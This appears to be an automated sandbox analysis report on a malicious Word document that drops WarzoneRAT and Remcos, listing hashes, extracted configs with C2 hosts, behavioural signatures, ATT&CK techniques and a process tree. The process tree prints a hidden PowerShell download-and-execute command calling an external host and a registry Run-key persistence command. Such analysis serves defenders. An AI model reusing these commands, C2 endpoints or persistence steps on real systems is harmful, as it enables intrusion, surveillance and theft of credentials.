Analysis

  • max time kernel
    149s
  • max time network
    167s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    12-07-2021 07:09

General

  • Target

    Picture 2.doc

  • Size

    662KB

  • MD5

    34e3b4a75f2f6a7a7b11296ff6dba01f

  • SHA1

    d10d95285be5981172a1ffc67d4cf1e7ef57e412

  • SHA256

    0366e6f59f94651e2db05a2275584a1fe93f992d937e9666fbec60d78edc6f85

  • SHA512

    b1b013e9d77b27b8b62fe9c04477eec79814330014fd7c9e724d6081bb14500eb207af678bbd86e75c500621d28d1214c23acf696c4aabd4090446ec492c22e1

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

httP://kqz.ugo.si/svchost.exe

Extracted

Family

warzonerat

C2

byx.z86.ru:5200

Extracted

Family

remcos

Version

1.7 Pro

Botnet

Host

C2

dpqw-avira.bot.nu:2404

Attributes
  • audio_folder

    audio

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    5

  • copy_file

    explorer.exe

  • copy_folder

    windows

  • delete_file

    false

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    true

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    remcos_abihghbcgbxx#

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screens

  • screenshot_path

    %AppData%

  • screenshot_time

    1

  • startup_value

    pdf

  • take_screenshot_option

    false

  • take_screenshot_time

    5

  • take_screenshot_title

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 8 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Picture 2.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1056
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\Admin\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\svchost.exe'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:736
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1620
        • C:\Users\Admin\AppData\Roaming\svchost.exe
          "{path}"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:436
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\svchost.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1956
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\svchost.exe"
              6⤵
                PID:1604
            • C:\ProgramData\svchost.exe
              "C:\ProgramData\svchost.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:300
              • C:\ProgramData\svchost.exe
                "{path}"
                6⤵
                • Executes dropped EXE
                PID:1324
              • C:\ProgramData\svchost.exe
                "{path}"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:2028
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe"
                  7⤵
                    PID:1752
                  • C:\Users\Admin\AppData\Roaming\GpqagBlFG.exe
                    "C:\Users\Admin\AppData\Roaming\GpqagBlFG.exe"
                    7⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    PID:736
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
                      8⤵
                      • Loads dropped DLL
                      PID:2044
                      • C:\Windows\SysWOW64\PING.EXE
                        PING 127.0.0.1 -n 2
                        9⤵
                        • Runs ping.exe
                        PID:892
                      • C:\Users\Admin\AppData\Roaming\windows\explorer.exe
                        "C:\Users\Admin\AppData\Roaming\windows\explorer.exe"
                        9⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        PID:1780
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\Admin\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\svchost.exe'"
          2⤵
          • Process spawned unexpected child process
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:300
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\Admin\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\svchost.exe'"
          2⤵
          • Process spawned unexpected child process
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1956
        • C:\Windows\splwow64.exe
          C:\Windows\splwow64.exe 12288
          2⤵
            PID:1952

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Persistence

        Registry Run Keys / Startup Folder

        1
        T1060

        Defense Evasion

        Modify Registry

        2
        T1112

        Credential Access

        Credentials in Files

        1
        T1081

        Discovery

        System Information Discovery

        1
        T1082

        Remote System Discovery

        1
        T1018

        Collection

        Data from Local System

        1
        T1005

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\svchost.exe
          MD5

          e6b478f5fc73dc7318854399abf505e3

          SHA1

          802fb03026a04b4027c3ff7fdf521d08195f8163

          SHA256

          99f6194509980cce34f244d9dbca6d6931f47a02361db73e0f2fc1fa103c997b

          SHA512

          9f94e00e1b30130e06749868dc5e492b74f47a67169b5e064ab09fc51fba01e4583adf0b3e730852bba272cfb6d7395f8d6c0078addb59f4b6cdd3c1874ae3d4

        • C:\ProgramData\svchost.exe
          MD5

          e6b478f5fc73dc7318854399abf505e3

          SHA1

          802fb03026a04b4027c3ff7fdf521d08195f8163

          SHA256

          99f6194509980cce34f244d9dbca6d6931f47a02361db73e0f2fc1fa103c997b

          SHA512

          9f94e00e1b30130e06749868dc5e492b74f47a67169b5e064ab09fc51fba01e4583adf0b3e730852bba272cfb6d7395f8d6c0078addb59f4b6cdd3c1874ae3d4

        • C:\ProgramData\svchost.exe
          MD5

          e6b478f5fc73dc7318854399abf505e3

          SHA1

          802fb03026a04b4027c3ff7fdf521d08195f8163

          SHA256

          99f6194509980cce34f244d9dbca6d6931f47a02361db73e0f2fc1fa103c997b

          SHA512

          9f94e00e1b30130e06749868dc5e492b74f47a67169b5e064ab09fc51fba01e4583adf0b3e730852bba272cfb6d7395f8d6c0078addb59f4b6cdd3c1874ae3d4

        • C:\ProgramData\svchost.exe
          MD5

          e6b478f5fc73dc7318854399abf505e3

          SHA1

          802fb03026a04b4027c3ff7fdf521d08195f8163

          SHA256

          99f6194509980cce34f244d9dbca6d6931f47a02361db73e0f2fc1fa103c997b

          SHA512

          9f94e00e1b30130e06749868dc5e492b74f47a67169b5e064ab09fc51fba01e4583adf0b3e730852bba272cfb6d7395f8d6c0078addb59f4b6cdd3c1874ae3d4

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
          MD5

          02ff38ac870de39782aeee04d7b48231

          SHA1

          0390d39fa216c9b0ecdb38238304e518fb2b5095

          SHA256

          fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

          SHA512

          24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba
          MD5

          75a8da7754349b38d64c87c938545b1b

          SHA1

          5c28c257d51f1c1587e29164cc03ea880c21b417

          SHA256

          bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

          SHA512

          798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370
          MD5

          be4d72095faf84233ac17b94744f7084

          SHA1

          cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

          SHA256

          b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

          SHA512

          43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b
          MD5

          df44874327d79bd75e4264cb8dc01811

          SHA1

          1396b06debed65ea93c24998d244edebd3c0209d

          SHA256

          55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

          SHA512

          95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eeb
          MD5

          597009ea0430a463753e0f5b1d1a249e

          SHA1

          4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

          SHA256

          3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

          SHA512

          5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598
          MD5

          5e3c7184a75d42dda1a83606a45001d8

          SHA1

          94ca15637721d88f30eb4b6220b805c5be0360ed

          SHA256

          8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

          SHA512

          fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
          MD5

          a725bb9fafcf91f3c6b7861a2bde6db2

          SHA1

          8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

          SHA256

          51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

          SHA512

          1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
          MD5

          a725bb9fafcf91f3c6b7861a2bde6db2

          SHA1

          8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

          SHA256

          51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

          SHA512

          1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9
          MD5

          b6d38f250ccc9003dd70efd3b778117f

          SHA1

          d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

          SHA256

          4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

          SHA512

          67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          MD5

          0e533b07aea23bd88e1f0bbfe419d923

          SHA1

          99933df18747e696754a1e91a0a6e41b5eeca8e4

          SHA256

          c0dd919f18b93da9f6cca11700eb8d4fd72e592f21f33fc95503418e6991e300

          SHA512

          e0cb7876e9181166bea2923214ef45399c3b0ea7605e500e3419fdf8a7dbae6dbbdf424d8b97f39a135449de07328116fcb9ad13f1dadaa7cb4721d81bfe65d5

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          MD5

          e81c7ad180e9efb3c275dc2a5224f3b3

          SHA1

          e502b85abde9b223e61fdf7496fdfae513e79365

          SHA256

          ab2657b6e798c361a175c829d0bbb1413b946c297405bd190bfd938c1d31d458

          SHA512

          1b4df1932ad76fba97fc07d22742eb192b5caad5219a604adff5b5805194cdcc7283370802572309428f14739f24d343a8aee821d6698b0e4c4cfb1aaca4c462

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          MD5

          1588c87c9b8726153eb242adcda2089f

          SHA1

          6d624f61875569d5e80d24b7e54289de80ab2d0a

          SHA256

          27ccb457e8132e7ddf81ec63c5e36e90f390e4a6de668ba43a8daf0eb9dc9fb6

          SHA512

          5b296422c43c0db55fa10fd55b2ecebfe85e72f133789b331eeef48b66fefdf9fb1bbe59cee1374dc17b9dcedb50df01dd2d0d43caa23b72145a2459cb0211d3

        • C:\Users\Admin\AppData\Local\Temp\install.bat
          MD5

          514640b2ac709250f11d838ad29e2c0f

          SHA1

          29046710afc21589b0ccd50379f76767b40b1819

          SHA256

          c98ac7e318fd8b9694a0966da406f3c87f20f41f82cf98359c6e4aaf3fd89e53

          SHA512

          f5666c13ab715486614652fa6b405c7cae843d3fa0b00d82d443ed0da8212084382e01e39fc5de1f194713ef397e793c712ff28df36e4bf27a62ea7eb109655e

        • C:\Users\Admin\AppData\Roaming\GpqagBlFG.exe
          MD5

          04694be6bf4a97114fda8dec4f9b8f42

          SHA1

          91f4b470a65d756c32ce1967b8e5300ba70383c5

          SHA256

          ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13

          SHA512

          9bec01db5b96b9a6aa9afc678aecc44bca7554b7c09588fc4504564269437995cb936c012b3f0a025e4b4cc566cec4dce8f3445ed23975fd0cecb50998e0ae27

        • C:\Users\Admin\AppData\Roaming\GpqagBlFG.exe
          MD5

          04694be6bf4a97114fda8dec4f9b8f42

          SHA1

          91f4b470a65d756c32ce1967b8e5300ba70383c5

          SHA256

          ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13

          SHA512

          9bec01db5b96b9a6aa9afc678aecc44bca7554b7c09588fc4504564269437995cb936c012b3f0a025e4b4cc566cec4dce8f3445ed23975fd0cecb50998e0ae27

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          MD5

          974da804f7c3eba9bedc9e48888206a4

          SHA1

          dcc2c989d7c76c71a01e6b2aef882a5dda225bdd

          SHA256

          53f0580a21e5af4348144668ac2b45c7844ec93ea964e5751f45c6366f482e38

          SHA512

          d00dc848bebebdc43bc1721b5404aedaca004aefd9d55ac532abcfadb3897c0a0754072703f975e8481c3fdcb411a56990ba665e8921ee57a4a814930562ff72

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          MD5

          974da804f7c3eba9bedc9e48888206a4

          SHA1

          dcc2c989d7c76c71a01e6b2aef882a5dda225bdd

          SHA256

          53f0580a21e5af4348144668ac2b45c7844ec93ea964e5751f45c6366f482e38

          SHA512

          d00dc848bebebdc43bc1721b5404aedaca004aefd9d55ac532abcfadb3897c0a0754072703f975e8481c3fdcb411a56990ba665e8921ee57a4a814930562ff72

        • C:\Users\Admin\AppData\Roaming\svchost.exe
          MD5

          e6b478f5fc73dc7318854399abf505e3

          SHA1

          802fb03026a04b4027c3ff7fdf521d08195f8163

          SHA256

          99f6194509980cce34f244d9dbca6d6931f47a02361db73e0f2fc1fa103c997b

          SHA512

          9f94e00e1b30130e06749868dc5e492b74f47a67169b5e064ab09fc51fba01e4583adf0b3e730852bba272cfb6d7395f8d6c0078addb59f4b6cdd3c1874ae3d4

        • C:\Users\Admin\AppData\Roaming\svchost.exe
          MD5

          e6b478f5fc73dc7318854399abf505e3

          SHA1

          802fb03026a04b4027c3ff7fdf521d08195f8163

          SHA256

          99f6194509980cce34f244d9dbca6d6931f47a02361db73e0f2fc1fa103c997b

          SHA512

          9f94e00e1b30130e06749868dc5e492b74f47a67169b5e064ab09fc51fba01e4583adf0b3e730852bba272cfb6d7395f8d6c0078addb59f4b6cdd3c1874ae3d4

        • C:\Users\Admin\AppData\Roaming\svchost.exe
          MD5

          e6b478f5fc73dc7318854399abf505e3

          SHA1

          802fb03026a04b4027c3ff7fdf521d08195f8163

          SHA256

          99f6194509980cce34f244d9dbca6d6931f47a02361db73e0f2fc1fa103c997b

          SHA512

          9f94e00e1b30130e06749868dc5e492b74f47a67169b5e064ab09fc51fba01e4583adf0b3e730852bba272cfb6d7395f8d6c0078addb59f4b6cdd3c1874ae3d4

        • C:\Users\Admin\AppData\Roaming\windows\explorer.exe
          MD5

          04694be6bf4a97114fda8dec4f9b8f42

          SHA1

          91f4b470a65d756c32ce1967b8e5300ba70383c5

          SHA256

          ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13

          SHA512

          9bec01db5b96b9a6aa9afc678aecc44bca7554b7c09588fc4504564269437995cb936c012b3f0a025e4b4cc566cec4dce8f3445ed23975fd0cecb50998e0ae27

        • C:\Users\Admin\AppData\Roaming\windows\explorer.exe
          MD5

          04694be6bf4a97114fda8dec4f9b8f42

          SHA1

          91f4b470a65d756c32ce1967b8e5300ba70383c5

          SHA256

          ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13

          SHA512

          9bec01db5b96b9a6aa9afc678aecc44bca7554b7c09588fc4504564269437995cb936c012b3f0a025e4b4cc566cec4dce8f3445ed23975fd0cecb50998e0ae27

        • \ProgramData\svchost.exe
          MD5

          e6b478f5fc73dc7318854399abf505e3

          SHA1

          802fb03026a04b4027c3ff7fdf521d08195f8163

          SHA256

          99f6194509980cce34f244d9dbca6d6931f47a02361db73e0f2fc1fa103c997b

          SHA512

          9f94e00e1b30130e06749868dc5e492b74f47a67169b5e064ab09fc51fba01e4583adf0b3e730852bba272cfb6d7395f8d6c0078addb59f4b6cdd3c1874ae3d4

        • \Users\Admin\AppData\Local\Temp\freebl3.dll
          MD5

          ef12ab9d0b231b8f898067b2114b1bc0

          SHA1

          6d90f27b2105945f9bb77039e8b892070a5f9442

          SHA256

          2b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7

          SHA512

          2aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193

        • \Users\Admin\AppData\Local\Temp\mozglue.dll
          MD5

          75f8cc548cabf0cc800c25047e4d3124

          SHA1

          602676768f9faecd35b48c38a0632781dfbde10c

          SHA256

          fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0

          SHA512

          ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f

        • \Users\Admin\AppData\Local\Temp\msvcp140.dll
          MD5

          109f0f02fd37c84bfc7508d4227d7ed5

          SHA1

          ef7420141bb15ac334d3964082361a460bfdb975

          SHA256

          334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

          SHA512

          46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

        • \Users\Admin\AppData\Local\Temp\nss3.dll
          MD5

          d7858e8449004e21b01d468e9fd04b82

          SHA1

          9524352071ede21c167e7e4f106e9526dc23ef4e

          SHA256

          78758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db

          SHA512

          1e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440

        • \Users\Admin\AppData\Local\Temp\softokn3.dll
          MD5

          471c983513694ac3002590345f2be0da

          SHA1

          6612b9af4ff6830fa9b7d4193078434ef72f775b

          SHA256

          bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f

          SHA512

          a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410

        • \Users\Admin\AppData\Local\Temp\vcruntime140.dll
          MD5

          7587bf9cb4147022cd5681b015183046

          SHA1

          f2106306a8f6f0da5afb7fc765cfa0757ad5a628

          SHA256

          c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

          SHA512

          0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

        • \Users\Admin\AppData\Roaming\GpqagBlFG.exe
          MD5

          04694be6bf4a97114fda8dec4f9b8f42

          SHA1

          91f4b470a65d756c32ce1967b8e5300ba70383c5

          SHA256

          ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13

          SHA512

          9bec01db5b96b9a6aa9afc678aecc44bca7554b7c09588fc4504564269437995cb936c012b3f0a025e4b4cc566cec4dce8f3445ed23975fd0cecb50998e0ae27

        • \Users\Admin\AppData\Roaming\GpqagBlFG.exe
          MD5

          04694be6bf4a97114fda8dec4f9b8f42

          SHA1

          91f4b470a65d756c32ce1967b8e5300ba70383c5

          SHA256

          ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13

          SHA512

          9bec01db5b96b9a6aa9afc678aecc44bca7554b7c09588fc4504564269437995cb936c012b3f0a025e4b4cc566cec4dce8f3445ed23975fd0cecb50998e0ae27

        • \Users\Admin\AppData\Roaming\svchost.exe
          MD5

          e6b478f5fc73dc7318854399abf505e3

          SHA1

          802fb03026a04b4027c3ff7fdf521d08195f8163

          SHA256

          99f6194509980cce34f244d9dbca6d6931f47a02361db73e0f2fc1fa103c997b

          SHA512

          9f94e00e1b30130e06749868dc5e492b74f47a67169b5e064ab09fc51fba01e4583adf0b3e730852bba272cfb6d7395f8d6c0078addb59f4b6cdd3c1874ae3d4

        • \Users\Admin\AppData\Roaming\windows\explorer.exe
          MD5

          04694be6bf4a97114fda8dec4f9b8f42

          SHA1

          91f4b470a65d756c32ce1967b8e5300ba70383c5

          SHA256

          ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13

          SHA512

          9bec01db5b96b9a6aa9afc678aecc44bca7554b7c09588fc4504564269437995cb936c012b3f0a025e4b4cc566cec4dce8f3445ed23975fd0cecb50998e0ae27

        • \Users\Admin\AppData\Roaming\windows\explorer.exe
          MD5

          04694be6bf4a97114fda8dec4f9b8f42

          SHA1

          91f4b470a65d756c32ce1967b8e5300ba70383c5

          SHA256

          ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13

          SHA512

          9bec01db5b96b9a6aa9afc678aecc44bca7554b7c09588fc4504564269437995cb936c012b3f0a025e4b4cc566cec4dce8f3445ed23975fd0cecb50998e0ae27

        • memory/300-87-0x0000000004980000-0x0000000004981000-memory.dmp
          Filesize

          4KB

        • memory/300-149-0x0000000007170000-0x0000000007171000-memory.dmp
          Filesize

          4KB

        • memory/300-145-0x0000000001280000-0x0000000001281000-memory.dmp
          Filesize

          4KB

        • memory/300-142-0x0000000000000000-mapping.dmp
        • memory/300-72-0x0000000000000000-mapping.dmp
        • memory/300-88-0x0000000004982000-0x0000000004983000-memory.dmp
          Filesize

          4KB

        • memory/436-135-0x0000000000400000-0x000000000055E000-memory.dmp
          Filesize

          1.4MB

        • memory/436-139-0x0000000000400000-0x000000000055E000-memory.dmp
          Filesize

          1.4MB

        • memory/436-136-0x0000000000405E28-mapping.dmp
        • memory/736-70-0x0000000001010000-0x0000000001011000-memory.dmp
          Filesize

          4KB

        • memory/736-66-0x0000000000A00000-0x0000000000A01000-memory.dmp
          Filesize

          4KB

        • memory/736-90-0x000000007EF30000-0x000000007EF31000-memory.dmp
          Filesize

          4KB

        • memory/736-97-0x0000000006090000-0x0000000006091000-memory.dmp
          Filesize

          4KB

        • memory/736-71-0x0000000005240000-0x0000000005241000-memory.dmp
          Filesize

          4KB

        • memory/736-162-0x0000000000000000-mapping.dmp
        • memory/736-113-0x00000000062B0000-0x00000000062B1000-memory.dmp
          Filesize

          4KB

        • memory/736-69-0x0000000004722000-0x0000000004723000-memory.dmp
          Filesize

          4KB

        • memory/736-98-0x0000000006120000-0x0000000006121000-memory.dmp
          Filesize

          4KB

        • memory/736-68-0x0000000004720000-0x0000000004721000-memory.dmp
          Filesize

          4KB

        • memory/736-64-0x0000000000000000-mapping.dmp
        • memory/736-105-0x0000000006280000-0x0000000006281000-memory.dmp
          Filesize

          4KB

        • memory/736-67-0x00000000047B0000-0x00000000047B1000-memory.dmp
          Filesize

          4KB

        • memory/736-91-0x0000000005FE0000-0x0000000005FE1000-memory.dmp
          Filesize

          4KB

        • memory/892-168-0x0000000000000000-mapping.dmp
        • memory/1056-63-0x0000000075FE1000-0x0000000075FE3000-memory.dmp
          Filesize

          8KB

        • memory/1056-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/1056-61-0x00000000702A1000-0x00000000702A3000-memory.dmp
          Filesize

          8KB

        • memory/1056-60-0x0000000072821000-0x0000000072824000-memory.dmp
          Filesize

          12KB

        • memory/1604-147-0x0000000000000000-mapping.dmp
        • memory/1620-130-0x00000000009B0000-0x00000000009B2000-memory.dmp
          Filesize

          8KB

        • memory/1620-134-0x00000000004A0000-0x00000000004D8000-memory.dmp
          Filesize

          224KB

        • memory/1620-124-0x0000000000000000-mapping.dmp
        • memory/1620-127-0x0000000001290000-0x0000000001291000-memory.dmp
          Filesize

          4KB

        • memory/1620-129-0x0000000004810000-0x0000000004811000-memory.dmp
          Filesize

          4KB

        • memory/1620-133-0x0000000008260000-0x00000000082E4000-memory.dmp
          Filesize

          528KB

        • memory/1752-158-0x0000000000000000-mapping.dmp
        • memory/1780-173-0x0000000000000000-mapping.dmp
        • memory/1952-132-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp
          Filesize

          8KB

        • memory/1952-131-0x0000000000000000-mapping.dmp
